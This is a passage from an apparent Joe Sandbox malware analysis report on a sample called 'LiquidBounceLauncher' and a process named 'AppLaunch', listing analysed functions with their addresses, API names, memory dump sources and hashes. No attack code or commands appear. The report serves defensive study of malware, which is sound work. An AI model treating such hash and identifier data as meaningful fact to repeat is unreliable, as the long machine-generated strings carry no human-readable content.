                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: localeconv$_strdupatoifreesetlocalestrchr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1444949750-0
                                                                                                                                                                                      • Opcode ID: fad84a75f0de30ff4bf5543b3ccd9d0efc018bd09818f7684aca4dff736a9ed3
                                                                                                                                                                                      • Instruction ID: 6609dce47c8c3d8778c22c521d7b00109abacf1202118b72107f3b942b8f1a01
                                                                                                                                                                                      • Opcode Fuzzy Hash: fad84a75f0de30ff4bf5543b3ccd9d0efc018bd09818f7684aca4dff736a9ed3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 470130706087218ED710EF76E44426BB7E0EF58354F948E2EE8C987351D378E4458B8A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0042D280 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strlenwcslen
                                                                                                                                                                                      • String ID: (null)$(null)
                                                                                                                                                                                      • API String ID: 803329031-1601437019
                                                                                                                                                                                      • Opcode ID: 1bb15581bbd64789d269cc8292497c0b0530991be74d79e545433669147a71e6
                                                                                                                                                                                      • Instruction ID: c316cc587ad2e4a15c655854d85043e86e791968c803ce573aafa9a026e04588
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bb15581bbd64789d269cc8292497c0b0530991be74d79e545433669147a71e6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11F0FB30B042558BCB04EE98E1C159F3761EF10308FA4443BE8428B306DB78ED568B9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00420250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • VirtualQuery failed for %d bytes at address %p, xrefs: 00420334
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Virtual$Protectmemcpy$Query
                                                                                                                                                                                      • String ID: VirtualQuery failed for %d bytes at address %p
                                                                                                                                                                                      • API String ID: 228986436-2206166143
                                                                                                                                                                                      • Opcode ID: f4a826929e89bc740106857229b2d304fec75c995df36ad31c8fb0d813916da8
                                                                                                                                                                                      • Instruction ID: 63c036b8ed4bd6924359a25c38e4e30a2aca42bab763496b8f72e770201aaf7b
                                                                                                                                                                                      • Opcode Fuzzy Hash: f4a826929e89bc740106857229b2d304fec75c995df36ad31c8fb0d813916da8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F031B16043109BD710AF6AE48465BBBE8AF85754F84892FE888C7311D779CC44D756
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004200B2 Relevance: 5.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4020351045-0
                                                                                                                                                                                      • Opcode ID: 80bb6c8ffb5c29476a98b90bba77bd9a99597d1b1215d93bf8c4d1efed0efe2e
                                                                                                                                                                                      • Instruction ID: 241a4ef351b408255d63c27352d4fadd161cc35806436075583bbb6ce9d372a3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 80bb6c8ffb5c29476a98b90bba77bd9a99597d1b1215d93bf8c4d1efed0efe2e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B01C4B17002218BD700FF74E89566AB7F1BB54304FD4453ED88887302E739AC99D786
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Function 0707D050 Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: |6`$|6`
                                                                                                                                                                                      • API String ID: 0-921354105
                                                                                                                                                                                      • Opcode ID: dfc4fb1ec118bee3eb2e0f5b0406be9b93cbfce2b244ee87ad88eb049737300f
                                                                                                                                                                                      • Instruction ID: d17fde2c6a304836ddc1c9fad86a1fa5ff1d6cb9bf12ec979f520cbb7629fd63
                                                                                                                                                                                      • Opcode Fuzzy Hash: dfc4fb1ec118bee3eb2e0f5b0406be9b93cbfce2b244ee87ad88eb049737300f
                                                                                                                                                                                      • Instruction Fuzzy Hash: A10152703013409FC7185F75A498B2B77A6FBC421AF14492DD54787784CFB1EC098B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07078818 Relevance: 2.0, Instructions: 1973COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: b810e8d7fb062150126eb73c1fbd940a31dbe4cdcf9b79a622018e615e474df6
                                                                                                                                                                                      • Instruction ID: 68ef1c58ef323e44a790bf47fcc63664f990fbb619cc20ae767a565779423045
                                                                                                                                                                                      • Opcode Fuzzy Hash: b810e8d7fb062150126eb73c1fbd940a31dbe4cdcf9b79a622018e615e474df6
                                                                                                                                                                                      • Instruction Fuzzy Hash: FC130038A01604DFCB169B70DA6499DB332FF6934AB11856EDC1236B62CB7F8942DF01
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707E6D8 Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: l3`
                                                                                                                                                                                      • API String ID: 0-1790451565
                                                                                                                                                                                      • Opcode ID: b0e8026961c84888d4fa729e26a626fa3ee8ad4b2df8b6134ac2fff353b80344
                                                                                                                                                                                      • Instruction ID: 1a0f3af2015cb3036a71f1aebc05acbebf23b22d452689f57c8c2d86e3fac70a
                                                                                                                                                                                      • Opcode Fuzzy Hash: b0e8026961c84888d4fa729e26a626fa3ee8ad4b2df8b6134ac2fff353b80344
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE17E74A01246DFCB54DF65E498A9EBBB2FF88314F148568E41AAB760DB30EC41CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707E6A0 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: l3`
                                                                                                                                                                                      • API String ID: 0-1790451565
                                                                                                                                                                                      • Opcode ID: 6880e57d4aa7350fb4a490a59a0f236de9e9add4a0feaa00b63f65e8b610927b
                                                                                                                                                                                      • Instruction ID: f83c3fd9943b40ba9b7f4a588cbfceab67266bdc7a3b93c5553f82fdaa8d4cf6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6880e57d4aa7350fb4a490a59a0f236de9e9add4a0feaa00b63f65e8b610927b
                                                                                                                                                                                      • Instruction Fuzzy Hash: E2914E74A01245DFCB09DF64D49999DBBB2FF88310F158599E40AAB361DB30EC41CF95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707D780 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ,u`
                                                                                                                                                                                      • API String ID: 0-2243671586
                                                                                                                                                                                      • Opcode ID: cf4a2582439b03f84976529062811fe99f45043f3cf88bc6d0f0b99072b852a5
                                                                                                                                                                                      • Instruction ID: 7d1fa01cca6af083961e399c2670014da274ff57d8f86843ada7e60796b05fa4
                                                                                                                                                                                      • Opcode Fuzzy Hash: cf4a2582439b03f84976529062811fe99f45043f3cf88bc6d0f0b99072b852a5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B718E74F002498FDB18DFA5C854AAEB7F2AFC9304F24852AD406EB750DB709C46CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07072DC8 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 8c*g
                                                                                                                                                                                      • API String ID: 0-3807855352
                                                                                                                                                                                      • Opcode ID: 308e2d88cd6c6794154c253a0329fbfc847616b8870f3c74c760fae71d60a9ef
                                                                                                                                                                                      • Instruction ID: 511a6a497512e4749725db204dded53e5289851419b2c942f0603b11ec3bd6c8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 308e2d88cd6c6794154c253a0329fbfc847616b8870f3c74c760fae71d60a9ef
                                                                                                                                                                                      • Instruction Fuzzy Hash: C741D230B019488FCB14FBB9D4584ADB7B6FFC9310B144A19E152A7398DF30A949CB93
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07072719 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: (>]
                                                                                                                                                                                      • API String ID: 0-486411242
                                                                                                                                                                                      • Opcode ID: e3030fb66f5138aa27b2cfbef2c04797bfdae24a4f08d3cc712af2bf250b6c57
                                                                                                                                                                                      • Instruction ID: cde54199d66b130ba1d7d4c531e0bb57c89bb68011af728d45a80c5703560103
                                                                                                                                                                                      • Opcode Fuzzy Hash: e3030fb66f5138aa27b2cfbef2c04797bfdae24a4f08d3cc712af2bf250b6c57
                                                                                                                                                                                      • Instruction Fuzzy Hash: A331B474B031009FC728EF7AD4185AD77E6FBC8201714846EE40AE3344DF358C0A8B92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707D76F Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ,u`
                                                                                                                                                                                      • API String ID: 0-2243671586
                                                                                                                                                                                      • Opcode ID: 8fbee2d0cd7c688e78454bbc50ad54d2bf2962b6df85bbd8a75401423c3f49c4
                                                                                                                                                                                      • Instruction ID: aac66d247bf0290b8877f29a024c5cfac5c32d10c498db755f016e74ec96a077
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fbee2d0cd7c688e78454bbc50ad54d2bf2962b6df85bbd8a75401423c3f49c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 244125B1E007498FCB05CFA9C8446DEFBF2AF89300F14866AD805BF610E770A946CB50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070786B7 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0]
                                                                                                                                                                                      • API String ID: 0-3781320242
                                                                                                                                                                                      • Opcode ID: a0e27d20da7d286ab7ad9c95fae5013b246943f5a43ee6211852bf8f3dcb2794
                                                                                                                                                                                      • Instruction ID: 3d0c26d96a93eaa932ceca1d967530dfc72da800fb639ab39c4fd845a91ea796
                                                                                                                                                                                      • Opcode Fuzzy Hash: a0e27d20da7d286ab7ad9c95fae5013b246943f5a43ee6211852bf8f3dcb2794
                                                                                                                                                                                      • Instruction Fuzzy Hash: EA31D331E01246CFCB15EFB9D4141EEB7B1FF86304B10862ED456E7641EB34A986CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707460F Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 8c*g
                                                                                                                                                                                      • API String ID: 0-3807855352
                                                                                                                                                                                      • Opcode ID: 4bf46139459be7c0c59cae0d03f6b00277efd778fdb060040d8c23781d01c6f0
                                                                                                                                                                                      • Instruction ID: b5f54a20ad5697bdef965c13c3aec3b421622a7a194602b1b801408a2d5907af
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bf46139459be7c0c59cae0d03f6b00277efd778fdb060040d8c23781d01c6f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: F73104B06022408FD725DF25D4047AA7BE6EFC5304F04896ED04AC7B65CB75A80ADB97
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070786E8 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0]
                                                                                                                                                                                      • API String ID: 0-3781320242
                                                                                                                                                                                      • Opcode ID: 89a94e037cb4d1fba9cbe6885f4fcfa8da5b96a1526796fe723dd8d6aadff521
                                                                                                                                                                                      • Instruction ID: 89c50233d2d2f8ab0e63dbf5224d47f96a978a0954f60e529773039822d9ac98
                                                                                                                                                                                      • Opcode Fuzzy Hash: 89a94e037cb4d1fba9cbe6885f4fcfa8da5b96a1526796fe723dd8d6aadff521
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E319331F116468BCB15EFB9D4142AEB7B5FFC5304B10862AC856A7780EB34A985CBD2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070746D8 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 8c*g
                                                                                                                                                                                      • API String ID: 0-3807855352
                                                                                                                                                                                      • Opcode ID: 30238d28f53d582ce16143db41c03c9bfad420e253899a39ed5ee7eaff537fe7
                                                                                                                                                                                      • Instruction ID: d66844e0a5b28e4167daf1e7dec9fb6af574fcb6d0ab4c493c63d7b9d097acc5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 30238d28f53d582ce16143db41c03c9bfad420e253899a39ed5ee7eaff537fe7
                                                                                                                                                                                      • Instruction Fuzzy Hash: D8019E306066448BD324EF6AE01866A73E3EBC8315B10892DC18A87744DFB5AC099BD3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707F3C8 Relevance: .4, Instructions: 408COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7a5ad533e6bb38dcbbe74f65d9f10463ad8d4c2e54626a73c0b2f97fcf65de26
                                                                                                                                                                                      • Instruction ID: 099203920d59e42511f49e9549d6f76992de33405d109d92dbd8acd70a3c395b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a5ad533e6bb38dcbbe74f65d9f10463ad8d4c2e54626a73c0b2f97fcf65de26
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE19E74B042418FD714DF78D898A6E7BF6EF89204F1584A9E506CB7A2DB34EC06CB52
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707DA60 Relevance: .4, Instructions: 391COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 49957ace2a0a08d30dabf11db65df2d53a5c7cd91382881cb3d522944cd7ad13
                                                                                                                                                                                      • Instruction ID: 72e8847d31bcf2eb3a44c8a3ece37a72b8caef93390bb6fc53b3c9d4eadf39eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 49957ace2a0a08d30dabf11db65df2d53a5c7cd91382881cb3d522944cd7ad13
                                                                                                                                                                                      • Instruction Fuzzy Hash: 26F17074B001488FDB48DFB9D898AAEBBF6EF89304F118069D506EB765DB309C42CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070708D0 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 12825c44b23c06992b94b41b863ec97445a4bf0840ec46e11bab377af9a7ab67
                                                                                                                                                                                      • Instruction ID: 7d566256be9998be6c3831407ede3bfc017247dd4b4720ec803216abd5789aa9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 12825c44b23c06992b94b41b863ec97445a4bf0840ec46e11bab377af9a7ab67
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE18D72A00215DFCF169FA1C944EE97BB2FF88300F0686A9E60A9B271DB31D955DF41
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 070708C1 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: a93f468b74f8e4f90ad87bb2a2aeafd43f481bdb8e0f6d566426727b5fde7643
                                                                                                                                                                                      • Instruction ID: d6ff634de3b12386419098ed24c236e694eb85fe77e0a71cbe42d188bf083316
                                                                                                                                                                                      • Opcode Fuzzy Hash: a93f468b74f8e4f90ad87bb2a2aeafd43f481bdb8e0f6d566426727b5fde7643
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CD17C72A10215DFCF169FA1C944ED97BB2FF88300F4682A9E6059B272DB32D955DF40
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0707F681 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.355015924.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7070000_AppLaunch.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: bb96377296681897dc808239cab8a00f629ab8a01b96454fea22fb4d6d42f470
                                                                                                                                                                                      • Instruction ID: b2a0d333535b64bf92f633a013333cecca28bd4a62028a1987c7c1ae05f85008
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb96377296681897dc808239cab8a00f629ab8a01b96454fea22fb4d6d42f470
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B618A757002118FC758DF79D898A6AB7F6FF89204B1645A9E506CB7B2CB30EC06CB52
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 07077CD0 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
